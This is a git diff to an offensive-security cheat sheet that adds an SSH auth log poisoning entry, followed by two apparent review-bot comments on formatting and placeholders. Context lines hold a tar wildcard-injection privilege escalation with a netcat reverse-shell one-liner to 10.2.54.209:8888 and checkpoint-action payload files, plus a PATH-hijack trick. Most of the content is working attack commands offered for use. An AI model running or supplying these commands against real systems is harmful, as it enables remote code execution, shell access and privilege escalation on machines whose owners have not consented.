diff --git a/Cheat Sheet.md b/Cheat Sheet.md index 3ef1399..4df8d03 100644 --- a/Cheat Sheet.md +++ b/Cheat Sheet.md @@ -118,6 +118,14 @@ $ kill %1 ### SSH Port Forwarding `ssh -L :localhost: @` +### SSH auth log poisoning + +Login as any user to see that it gets logged then try to login with a malicious php code + +`ssh ''@192.168.43.2` + +Then `http://ip/page?a=whoami;` + ### Tar Exploitation When ever you see a cronjob running with a command `cd //andre/backup tar -zcf //filetar.gz *` go to that folder from which a backup is being created and running these command in that directory
@@ -126,6 +134,7 @@ echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0/tmp/lhen echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 ``` + ### Binary Exploits If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed
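Review bot: In the first hunk, the added line `ssh ''@192.168.43.2` has an empty quoted string where the user name goes, so the command as committed does not show what the sentence above it describes, and it hard-codes the address 192.168.43.2 while the next added line uses the placeholder `ip` in `http://ip/page?a=whoami;`. Use one host placeholder in both lines, and say in the text what `page` and the `a` parameter refer to and what has to be true of the target for the second step to apply, since nothing in the entry states that. Two style points in the same hunk: the heading `### SSH auth log poisoning` is sentence case while the neighbouring headings (`### SSH Port Forwarding`, `### Tar Exploitation`, `### Binary Exploits`) are title case, and "Login as any user" should read "Log in as any user", with the sentence split before "then".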
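Review bot: The second hunk's only change is a blank line between the closing code fence and `### Binary Exploits`, which is unrelated to the section added in the first hunk; consider moving it to its own whitespace commit so the history of the new entry stays clean. The same spacing is not applied in the first hunk, where `### SSH auth log poisoning` is added directly under the `ssh -L` line with no blank line before the heading, so add one there for consistency.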